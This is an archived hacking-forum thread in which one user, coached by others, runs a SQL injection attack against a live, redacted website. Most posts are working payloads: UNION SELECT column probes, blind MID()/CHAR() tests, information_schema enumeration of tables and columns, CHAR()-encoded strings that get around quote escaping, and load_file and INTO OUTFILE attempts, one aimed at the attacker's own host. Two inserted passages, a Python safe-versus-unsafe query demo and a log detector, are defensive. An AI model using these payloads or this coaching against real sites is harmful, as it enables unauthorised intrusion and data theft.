Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Current Page: 1 of 2
Possible Sql Injection?
Posted by: Jiu
Date: November 14, 2007 12:12PM

Hi all,

I just discovered your site, and I have some questions ^^

There is a site like this:

hxxp://www.***.com/***.php?id=24

When I try this:

hxxp://www.***.com/***.php?id='
it gives an error =>
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
Ok, magic_quotes is on :S

Now I try this
hxxp://www.***.com/***.php?id=24 union select null--
=> "The used SELECT statements have a different number of columns"
Perhaps an SQL injection is possible? So I continue to find the number of columns

When I try hxxp://www.***.com/***.php?id=24 union select null,null,null,null--
it works! It displays the site

But where the text normally is, it shows again "The used SELECT statements have a different number of columns". Why? ^^'

If no injection is possible, tell me too :S

thx

Jiu

P.S.: Sorry for my English ^^'

Re: Possible Sql Injection?
Posted by: Anonymous User
Date: November 14, 2007 12:47PM

Maybe this will interest you:

1 AND(SELECT * FROM table2 ) = 1 

In the query:

SELECT * FROM table where id = 1 AND(SELECT * FROM table2 ) = 1 

This outputs: "Operand should contain N column(s)" 

where N is the number of columns in table2

I use this to detect the N columns; probably the easiest way to detect them.

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 14, 2007 02:06PM

Thx for your answer ^^

I tried, but I don't have the name of the table :S

when I put it in the url like this (I hope that's how you explained it):

hxxp://www.***.com/***.php?id=24 union SELECT*FROM table where id = 1 AND (SELECT*FROM table2) = 1

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table where id = 1 AND(SELECT * FROM table2 ) = 1' at line 1"

then I try this:

hxxp://www.***.com/***.php?id=24 union SELECT * FROM table

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table' at line 1"

then with

hxxp://www.***.com/***.php?id=24 union%20SELECT * FROM table2

"Table '***.table2' doesn't exist"

I deduce that "table" is a valid table, am I right?

Jiu

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 14, 2007 06:57PM

Quote

When i try hxxp://www.***.com/***.php?id=24 union select null,null,null,null--
thats works! that display the site

But where there is the text normally, that marks again "The used SELECT statements have a different number of columns" why? ^^'

I guess it's because the variable "id" is passed through 2 queries. The first SELECTs from 4 columns, as you found out; the second may SELECT from a different number of columns and throws an error. However you've already proven that SQL injection is possible, so don't worry about the second query and inject whatever you want into the first by using union select with 4 columns.

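The two-query behaviour Reiners describes, shown as an added example that is not part of the original thread: a constructed SQLite schema (the real table and its columns are unknown) stands in for the page query, query_unsafe() splices the id parameter into the SQL text the way the vulnerable page does, and query_safe() shows the fix, an integer check plus a bound parameter. The column-count error and the UNION that renders both reproduce against the unsafe form, and neither reaches the safe one.

```python
import sqlite3


# Constructed schema standing in for the unknown 4-column page query the thread
# inferred (assumption: the real table, column names and rows are not known).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT, author TEXT)")
    conn.executemany(
        "INSERT INTO pages VALUES (?, ?, ?, ?)",
        [(24, "Accueil", "Welcome text", "admin"), (25, "Contact", "Mail us", "admin")],
    )
    return conn


def query_unsafe(conn, id_param):
    """Vulnerable pattern: the request parameter is spliced into the SQL text.

    Returns ("rows", rows) or ("error", message) so the two outcomes the thread
    saw (a column-count error vs. a page that renders) can be compared directly.
    """
    sql = "SELECT id, title, body, author FROM pages WHERE id = " + id_param
    try:
        return ("rows", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def query_safe(conn, id_param):
    """Hardened form: validate the type first, then bind the value as a parameter.

    A value such as '24 union select ...' never reaches the SQL parser: int()
    rejects it, and even a numeric string is passed as data, not as SQL.
    """
    try:
        page_id = int(id_param)
    except (TypeError, ValueError):
        return ("rejected", "id must be an integer")
    rows = conn.execute(
        "SELECT id, title, body, author FROM pages WHERE id = ?", (page_id,)
    ).fetchall()
    return ("rows", rows)


if __name__ == "__main__":
    db = make_db()
    for value in ("24",
                  "24 union select null--",
                  "24 union select null,null,null,null--",
                  "24 AND 1=0 UNION SELECT 111,222,333,444--"):
        print(repr(value))
        print("  unsafe:", query_unsafe(db, value))
        print("  safe:  ", query_safe(db, value))
```

The unsafe form returns the same column-count error the thread saw for a one-column UNION, accepts a four-column UNION, and with `AND 1=0` returns only the injected row, which is exactly the "does 333 show up in the source?" test discussed later. The safe form rejects every non-integer value before any SQL is built.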
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 19, 2007 02:00PM

Ok I try to do it with the first select

I read your article on "how to find table name" with information_schema.tables

But I can't see the output, so I try to do it with blind SQL.

I try this hxxp://www.***.com/***.php?id=24 AND MID(version(),1,1) like 4--
that doesn't display the window

I try this hxxp://www.***.com/***.php?id=24 AND MID(version(),1,1) like 5--
ok, MySQL version is 5.

hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 5 LIMIT 1),1,1) > m--

(is the "version" the version of MySQL or something else?)

I obtain "Unknown column 'm' in 'where clause'"

Jiu

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 19, 2007 02:29PM

you forgot to quote the 'm'
24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) > 'm' /*
Chars always have to be quoted, else they will get parsed as identifiers.

in this case "version" is a column of the information_schema table and has nothing to do with the MySQL version. It's just a unique value I use to find only user generated tables. I'll try to make that more clear in my article ;)

Also note that this is a blind SQL technique. Maybe you can try something like:
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT table_name,null,null,null FROM information_schema.tables WHERE version = 9 /*

Feel free to post any other incomprehensiblenesses (what a word ;)

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 19, 2007 03:03PM

Thx for your answer

Arf, I don't have access to single quotes ^^'

I must use blind SQL, because with union I can't see the output :S
(it would appear on the page, no?)

I try something with CONCAT like this:

hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) < CONCAT(CHAR(39),CHAR(97),CHAR(39))--

==> < 'a'

but it doesn't work xD

hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) < CHAR(97)--

but that doesn't work either...

I try if the first letter is 'a' too :)

Perhaps I don't use CHAR() or CONCAT() correctly ^^'

Jiu

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 19, 2007 03:18PM

that query is correct:
hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) < CHAR(97)

but that tests if the first letter of the table name is smaller than 'a', which is unlikely ;) You may want to test if it's bigger (>) or smaller than 'm', the middle of the alphabet ;) Then narrow down your result step by step until you find the right letter.
If the result is correct, the normal page with id=24 appears, otherwise you should see something different.

Maybe you try
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,333,444 /*
first, and then look if one of the numbers appears in the source code. If so, replace this column with your injection.
For example, if you see 333 in the source code, then you can use:
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables WHERE version = 9 LIMIT 1
Just a test. If you can't find any of the injected numbers, you have to continue using blind SQLi.

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 19, 2007 03:41PM

if there are any problems with version=9 you have to think up another way to limit the result to only one user generated table, since you don't want to bruteforce the system table names.
You could also try:

24 AND (SELECT count(*) FROM information_schema.tables) = 34

to find out how many entries the information_schema.tables table has, and then begin with bruting the last one (user generated tables are usually stored at the bottom of the table):

24 AND MID((SELECT table_name FROM information_schema.tables LIMIT 33,1),1,1) > CHAR(109)

which will look if the 34th table name (usually the first user generated table) starts with a letter bigger than 'm'.

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 20, 2007 10:13AM

Yes I have tried with > 'a'

hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) > CHAR(97)

But it doesn't work, perhaps the "version=9" is wrong ^^'

I did what you said too
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,333,444--

The "333" appears in the source, in the title

Then I do
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables WHERE version = 9 LIMIT 1

But nothing appears in the source code ^^'
So must I continue with blind SQL, or is it the "version=9"?

Perhaps I will make a little program that can search for valid tables by wordlist ^^

Jiu



Edited 1 time(s). Last edit at 11/20/2007 10:15AM by Jiu.

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 20, 2007 01:59PM

Does the user name appear in the title (just for testing)?
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,user(),444 /*

I guess you don't have access to the information_schema table ... try this (without the version=9 thing):

hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables LIMIT 1

this should give you a table name in the title (it's probably not a user generated table but another system table, like "CHARACTER_SETS")

If the user() thing worked, but it doesn't display anything from the information_schema table, you probably don't have access to it.

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 20, 2007 02:24PM

I tried it with success! I have all the table_names and all the column_names =D

(without seeing the message ^^)

But now, how can I know which column is in which table? xD

thx

Jiu

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 20, 2007 02:52PM

Hi, good news. Please don't forget to write how you did it to help other readers :)

I would try to check information_schema.columns like:

UNION SELECT column_name FROM information_schema.columns WHERE table_name = "thetablename"
(only replace "thetablename" with what you have found)

this will fetch all column names in that table. If you can access only one at a time use LIMIT 0,1 to get the first, LIMIT 1,1 to get the second, LIMIT 2,1 for the third and so on.

UNION SELECT column_name FROM information_schema.columns WHERE table_name = "thetablename" LIMIT 0,1



Edited 1 time(s). Last edit at 11/20/2007 02:55PM by Reiners.

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 20, 2007 03:16PM

To find tables and columns I did what you said:

hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables LIMIT 1,1
the table_name was in the title and I just changed the limit, like LIMIT 2,1 => LIMIT 3,1 (I began at 15, because the first tables are already defined by MySQL)

Same for columns but with hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,column_name,444 FROM information_schema.columns LIMIT 1,1
(began with 100 because the first columns are already defined)

Now I try to find which table the columns come from:
hxxp://www.***.com/***.php?id=24 UNION SELECT column_name FROM information_schema.columns WHERE table_name = "thetablename" LIMIT 0,1

And that gives this: Unknown column 'thetablename' in 'where clause'
Perhaps because I must quote the table name? But I don't have access to quotes...
Can I use CONCAT(CHAR(),CHAR(),...,CHAR())?

thx

Jiu

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 20, 2007 04:12PM

as posted above
Quote

replace "thetablename" with what you have found
... so if you found out "users" is a table name, you get all column names for "users" with:

hxxp://www.***.com/***.php?id=24 UNION SELECT column_name FROM information_schema.columns WHERE table_name = "users" LIMIT 0,1

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 21, 2007 03:29AM

Yeah I know about the table name, I just said that because I have tried with a lot of tables...

But I don't have access to quotes or double quotes, and without quotes that gives me Unknown column 'thetablename' in 'where clause'

So I ask you if I can use CONCAT? ^^

Jiu

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 21, 2007 12:05PM

yes, you can :)
I recommend using .mario's toCharCode()

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 21, 2007 01:16PM

Ok thx, that works ^^

hxxp://www.***.com/***.php?id=24 and 0=1 union select null,null,column_name,null from information_schema.columns where table_name = CONCAT(Char(97),Char(99),Char(99),Char(117),Char(101),Char(105),Char(108)) Limit 0,1

I obtain the columns from the table "accueil" :)

Now if you have a website that converts a string into a sequence of CHAR(), I'll take it :p

Jiu

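From the defender's side, the requests traded in this thread (UNION SELECT with a matching column count, blind MID()/CHAR() comparisons, information_schema enumeration, CHAR()-encoded strings used to avoid quotes, and later load_file()/INTO OUTFILE) all leave recognisable traces in the web server's access log. The following is an added example, not code from the original thread: a small Python scanner that URL-decodes each request's query string and matches it against a named signature per technique. The log lines, host, paths and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Detection rules for the techniques this thread walks through. Each regex is
# applied to the URL-decoded, lower-cased query string of a request.
RULES = [
    ("union_select",    re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema_enum",     re.compile(r"\binformation_schema\.(?:tables|columns)\b")),
    ("blind_substring", re.compile(r"\b(?:mid|substring|substr)\s*\(.*\)\s*(?:<|>|=|like)\s*")),
    ("char_encoding",   re.compile(r"\bchar\s*\(\s*\d+\s*\)")),
    ("file_access",     re.compile(r"\bload_file\s*\(|\binto\s+outfile\b")),
    ("comment_tail",    re.compile(r"(?:--|/\*)\s*$")),
]

# Request line inside an Apache combined-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed access-log lines (hypothetical host, paths and times) modelled on
# the requests described in the thread, plus two benign ones.
LOG_LINES = [
    '10.0.0.5 - - [20/Nov/2007:10:13:00 +0100] "GET /page.php?id=24 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [20/Nov/2007:10:13:07 +0100] "GET /page.php?id=24%20union%20select%20null,null,null,null-- HTTP/1.1" 200 5120',
    '10.0.0.5 - - [20/Nov/2007:10:14:02 +0100] "GET /page.php?id=24%20AND%20MID((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2033,1),1,1)%20%3E%20CHAR(109) HTTP/1.1" 200 5120',
    '10.0.0.5 - - [22/Nov/2007:14:50:11 +0100] "GET /page.php?id=24%20and%201=0%20union%20select%20null,null,load_file(CONCAT(CHAR(102),CHAR(105),CHAR(108),CHAR(101))),null-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [22/Nov/2007:14:51:00 +0100] "GET /search.php?q=select+a+character HTTP/1.1" 200 812',
]


def decode_query(log_line):
    """Extract the request target and return its URL-decoded, lower-cased query string."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return ""
    target = m.group(1)
    query = target.split("?", 1)[1] if "?" in target else ""
    return unquote_plus(query).lower()


def scan_request(log_line):
    """Return the names of every rule that fires on one log line (in RULES order)."""
    decoded = decode_query(log_line)
    return [name for name, pattern in RULES if pattern.search(decoded)]


def scan_log(lines):
    """Return (line_index, [rule names]) for each line that triggered at least one rule."""
    hits = []
    for idx, line in enumerate(lines):
        names = scan_request(line)
        if names:
            hits.append((idx, names))
    return hits


if __name__ == "__main__":
    for idx, names in scan_log(LOG_LINES):
        print(f"line {idx}: {', '.join(names)}")
```

Decoding before matching matters: the blind probe in the third line only reveals its `>` comparison once `%3E` is decoded, and `+` in the benign search query becomes a space so that "select a character" is judged on its real content and does not trip the CHAR() rule. Several rules firing on one line (UNION plus CHAR() plus load_file) is a much stronger signal than any single one.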
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 21, 2007 04:43PM

mario quickly implemented this in his PHP charset encoder. thanks mario ;)

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 22, 2007 04:58AM

I think it doesn't work or I don't use it correctly

I just created this Java code ^^

import java.util.Scanner;

public class test {
    private static Scanner scanner = new Scanner(System.in);

    public static void main(String[] args) {
        System.out.print("Enter a String: ");
        String t = scanner.next();
        char[] ch = t.toCharArray();
        for (int i = 0; i < ch.length; i++) {
            // Casting a char to int gives its code point, e.g. 'a' -> 97.
            System.out.print("CHAR(" + (int) ch[i] + "),");
        }
    }
}

Ok it's basic xD I must make it so you can inject the url directly, but I have no time for the moment (I'll do that in Perl normally)

After I have found the columns from the table, can I update something?

Like 24 update table_name set column_name = 'blabla'; ?

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 22, 2007 09:28AM

use mario's PHP charset encoder. Type in the table name in the first box and then select the option "to SQL char()" above this box near "convert:".

Your Java code doesn't work because you use "(int)ch", which type casts the letter to int, which does not mean that this will return the char code of this letter.

On MySQL you can't use INSERT as a subquery of SELECT. And you can't use a semicolon or something to start a new query; that doesn't work on MySQL either. So you can't update/insert anything as long as you don't find a vulnerable INSERT query on that page.

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 22, 2007 10:41AM

In Java, when you cast a char to int, that gives you the number of the char ^^

So that works (I obtain the same result as mario) :)

And to simplify things I do this

import java.util.Scanner;

public class test {
    private static Scanner scanner = new Scanner(System.in);

    public static void main(String[] args) {
        System.out.print("Enter a String: ");
        String t = scanner.next();
        // Several names separated by "," are converted one per line.
        String[] g = t.split(",");
        char[] ch;
        for (int i = 0; i < g.length; i++) {
            ch = g[i].toCharArray();
            for (int j = 0; j < ch.length; j++) {
                System.out.print(",CHAR(" + (int) ch[j] + ")");
            }
            System.out.println();
        }
    }
}

Just put your table names with a "," between each table name, and you get all the char results ^^



Edited 1 time(s). Last edit at 11/22/2007 12:32PM by Jiu.

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 22, 2007 10:50AM

ah ok, sorry I got you wrong, I thought your code was not working and that was the first thing I thought of when looking through without testing. But it works well indeed ;)

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 22, 2007 12:40PM

So when I have tables and columns, what can I do?

There is no user table and no password ^^'
And like you said, I can't update :p

Jiu

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 22, 2007 01:36PM

^^ you should have thought about what you want to do in the beginning ;)
try load_file, INTO outfile. Otherwise there is nothing interesting I can think of if there is nothing else stored in the DB.

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 22, 2007 02:50PM

Ok I try this

hxxp://www.***.com/***.php?id=24 and 1=0 union select null,null,load_file(CONCAT(/../../../../file.txt)),null--

seems that doesn't work (perhaps wrong syntax)(doesn't display anything)

and when I try

hxxp://www.***.com/***.php?id=24 and 1=0 union select * from accueil into outfile(CONCAT(hxxp://mysite.com/file.txt))

that gives:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(CONCAT(CHAR(104),CHAR(116),CHAR(116),CHAR(112),CHAR(58),CHAR(47),CHAR(47),CHAR(' at line 1

Does that mean I can't use it, or is it because I use the wrong syntax?

Thx
Jiu



Edited 1 time(s). Last edit at 11/22/2007 04:33PM by Jiu.

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 24, 2007 07:55PM

regarding your first url, load_file():
use concat(char(),char() ...) and make sure the file exists. Furthermore make sure you have the FILE privilege.

regarding your second url, INTO OUTFILE:
you got the wrong INTO OUTFILE syntax; you have to use quotes (there is no way to avoid this):
... into outfile 'file.txt'

And think about your target again ... wouldn't it be scary if everyone could use MySQL to write on any webserver? ;)

More about the FILE privilege, how to find out if you have it and about INTO OUTFILE can be found in this article.

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 25, 2007 02:57PM

hxxp://www.xxx.com/xxx.php?id=24 and 1=0 union select null,null,file_priv,null FROM mysql.user WHERE user = CONCAT(Char(),Char(),...)-- (The username of server in the CONCAT)
I obtain:
SELECT command denied to user 'username'@'server' for table 'user'

so I think that I don't have the file privilege? :(

Jiu

Re: Possible Sql Injection?
Posted by: Reiners
Date: November 25, 2007 06:47PM

that means you have no access to the mysql.user table, as the error says.

Re: Possible Sql Injection?
Posted by: Jiu
Date: November 26, 2007 11:34AM

So how can I know if I have the file privilege? ^^

Your articles are nice and teach well how to inject code ^^

Jiu
